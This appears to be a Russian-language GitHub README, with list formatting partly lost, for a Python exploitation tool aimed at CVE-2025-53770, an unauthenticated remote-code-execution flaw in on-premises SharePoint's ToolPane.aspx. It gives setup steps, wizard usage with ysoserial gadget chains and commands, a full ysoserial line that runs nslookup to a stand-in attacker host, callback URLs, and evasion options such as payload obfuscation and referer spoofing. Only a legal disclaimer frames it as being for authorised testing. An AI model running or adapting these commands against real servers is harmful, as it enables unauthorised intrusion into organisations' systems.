
Сложный, управляемый мастером Python-эксплойт, нацеленный на CVE-2025-53770 — критическую (CVSS 9.8) уязвимость неавторизованного удаленного выполнения кода (RCE) в локальной версии Microsoft SharePoint Server (2016, 2019, Subscription Edition).
Divine Absolute — это сложный, управляемый мастером инструмент эксплуатации на Python, нацеленный на CVE-2025-53770, критическую (CVSS 9.8) уязвимость удалённого выполнения кода без аутентификации в локальных версиях Microsoft SharePoint Server (2016, 2019, Subscription Edition). Эта уязвимость, раскрытая как zero-day 19 июля 2025 года, возникает из-за десериализации недоверенных данных в /_layouts/15/ToolPane.aspx. Инструмент предназначен исключительно для этического тестирования на проникновение и авторизованных исследований безопасности, обеспечивая непревзойдённую точность, скрытность и адаптивность для разведки, эксплуатации и верификации.
Репозиторий: https://github.com/exfil0/CVE-2025-53770
⚠️ Юридическое предупреждение: Этот инструмент предназначен для законного, авторизованного использования только в контролируемых средах с явного разрешения. Несанкционированное использование против систем, которыми вы не владеете или не имеете разрешения на тестирование, незаконно и может повлечь серьёзные правовые последствия. Автор не несёт ответственности за неправомерное использование.
ToolPane.aspx с расширенной оценкой и регулярными выражениями (например, 16.0.0.\d+-\w+?).ToolPane.aspx с надёжными обходами.WebRequest.Create, Dns.GetHostEntry).-enc)./xp.aspx, на основе UUID).www.google.com), пользовательские URL или внутренние пути SharePoint (например, /_layouts/15/sharepoint.aspx)./_layouts/15/ToolPane.aspx./ToolPane.aspx, использование правил WAF (например, Cloudflare).pip install requests termcolor
pip install pythonnet
ysoserial.exe в известный путь (например, ./ysoserial.exe).# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS (через Homebrew)
brew install mono
docker pull mcr.microsoft.com/sharepoint/server:2019
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
pip install -r requirements.txt
ysoserial.exe доступен, или укажите путь к нему во время выполнения.Запустите интерактивный мастер:
python divine_absolute.py
Recon: Сканирует на наличие SharePoint и версию.Exploit: Отправляет полезную нагрузку в ToolPane.aspx.Full: Разведка + эксплуатация (опциональный агрессивный режим).https://sharepoint.example.com).ObjectDataProvider) и команду (например, cmd /c whoami).http://attacker.com/callback или sub.attacker.com).NONE, , или пользовательский фрагмент.python divine_absolute.py
# Выберите: Mode=Recon, Target=https://sharepoint.example.com
python divine_absolute.py
# Выберите: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
# ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
# Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
python divine_absolute.py
# Выберите: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
python divine_absolute.py
# Выберите: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
Результаты сохраняются в xanthorox_results.json со следующими полями:
target: Проверенный URL.sharepoint_detected: Логическое значение.toolpane_accessible: Логическое значение.exploited: Логическое значение (полезная нагрузка отправлена).verified_rce: Логическое/None (RCE подтверждено).error: Любые возникшие ошибки.Пример:
[
{
"target": "https://sharepoint.example.com",
"sharepoint_detected": true,
"toolpane_accessible": true,
"exploited": true,
"verified_rce": true,
"error": null
}
]
Эта версия исправляет:
-enc); поддерживает не-PowerShell (например, cmd.exe) с предупреждениями.pythonnet для надёжного DNS pingback с Dns.GetHostEntry (экспериментально, требует гаджета для полного эффекта).ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 и проверяйте DNS-логи.Dns.GetHostEntry в pythonnet может не срабатывать без определённой цепочки гаджетов.Приветствуются любые вклады! Пожалуйста:
git checkout -b feature/awesome-improvement).git commit -m "Add awesome improvement").git push origin feature/awesome-improvement).Этот проект лицензирован под лицензией MIT. Подробности см. в файле LICENSE.
Примечание: Всегда проверяйте полезные нагрузки и конфигурации в контролируемой лаборатории перед использованием. Будьте этичны и законны.
RequestException, настраиваемыми кодами состояния и путями.MicrosoftSharePointTeamServices), пути (например, /versions.aspx) и регулярные выражения.BASIC_REFLECTIONCONCAT_OBFUSCATEDNONE, FIXED (например, /xp.aspx), RANDOM (на основе UUID).DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.http://127.0.0.1:8080)./sitepages/result.txt), регулярные выражения (например, Xanthorox.*), коды состояния (например, 200,403), количество попыток, задержку и таймаут.